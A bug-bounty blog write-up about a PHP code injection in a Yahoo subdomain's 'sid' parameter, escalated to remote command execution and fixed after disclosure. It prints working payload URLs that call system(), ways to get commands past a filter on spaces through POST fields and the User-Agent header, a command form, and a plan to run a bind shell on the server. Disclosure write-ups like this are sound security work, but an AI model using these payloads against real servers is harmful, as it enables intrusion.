This is my first writeup for the blog, which I choose to be about “Yahoo Remote Code Execution” Vulnerability.
The case started with a “Remote PHP Code Injection” vulnerability that later escalated to “Remote Command Execution”.
The server got many other Yahoo! sub-domains!
What is “Remote PHP Code Injection” ?
Simply, PHPCI occurs when user-supplied(GET/POST) values of the parameters are reflected inside eval() function, that vulnerability allows attackers to execute PHP code such as system(“id”) or any other php function/code.
That said, I was able to inject PHP code by manuplating the value of the parameter “sid”.
In the beginning I tried to check the directories and files by “dir” using the SYSTEM function:
Indeed I need a better view!, so I tried with system(“ls -la”) But!?
It didn’t work! it does not accept any spaces in the url!!
Actually I need a good proof of concept to explain to Yahoo! Security Team how dangerous is this vulnerability, despite the number of Yahoo! sub-domains hosted on the same server.
So I tried to bypass that issue by some tricks including URL ENCODING the space with %20 but it didn’t work. Same result with double URL encoding!
e.g. http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system(“ls%20-la”))}
I also tried to go arround by using the function file_get_contents(“http://sec-down.com/poc.txt”) but this one dosen’t work because of the folder permissions, did you say do it in /tmp ?!
I thought of:
1- uploading “bind.sh” which is a bind connection script, into /tmp directory
2- Execute it to make a bind connection with the server
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system(“./tmp/bind.sh”))}
3- Receive the connection from the server on Netcat and now I will be free to run whatever Commands
But actually Netcat is a Hacking tool! it also could be detected by any simple AV/IDS on the system! this could corrupt the whole thing!
I’ve to go for another solution.
Thanks to Ahmed Abul-Ela and Ibrahim Mosaad I was able to execute commands using system($_POST['x2'])
<form method=”POST” action=”http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system($_POST['x2']))}“>
<input type=”text” name=”x2″>
Also by using system($_SERVER['HTTP_USER_AGENT']) and then inject my commands inside the userAgent.
.e.g http://tw.user.mall.yahoo.com/rating/list?sid=[email protected](system($_SERVER['HTTP_USER_AGENT']))}
Yea I know there have been other good tricks such as using readfile(“/etc/passwd”) and many more, despite the adrenaline I had, but as you know those ideas never come to mind when you need it
Sample POC for the Vulnerability [Allowed by Yahoo! to be public]:
Jan 20, 2014 at 6:39 PM – Intial Report to Yahoo! Security Team.
Jan 20, 2014 at 6:56 PM – Update 1 sent to Yahoo! that server kernel was old one with a well known “Local Privilage Esclation” vulnerability which means an attacker with such vulnerability can gain ROOT ACCESS to the server!!!!
Jan 21, 2014 at 6:44 PM – Yahoo! Acknowledged the vulnerability and pushed a Fix for it.
Thanks to Yahoo! Security team for the fast fix release.
BTW No news about the bounty yet!
Follow me: twitter.com/zigoo0